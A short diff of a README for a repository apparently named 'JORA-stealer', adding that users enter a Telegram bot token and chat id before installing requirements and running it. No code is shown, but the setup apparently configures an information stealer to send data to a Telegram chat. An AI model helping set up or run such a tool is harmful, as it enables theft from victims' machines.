virus242/JORA-stealer/README.md

 You need to pull the project fromthe repository.

-Fill in the details of your telegram.
+Fill in the details of your telegram (TOKEN bot and your chat id)

 Install all libraries from requirements.txt , start the virtual environment and run the command